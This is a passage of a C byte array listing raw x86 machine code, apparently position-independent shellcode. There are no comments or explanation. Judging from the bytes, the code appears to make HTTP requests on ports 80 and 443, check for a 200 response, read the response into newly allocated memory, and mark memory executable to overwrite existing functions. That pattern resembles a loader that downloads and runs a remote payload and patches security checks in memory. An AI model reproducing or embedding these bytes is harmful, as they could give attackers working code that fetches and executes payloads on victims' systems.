118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
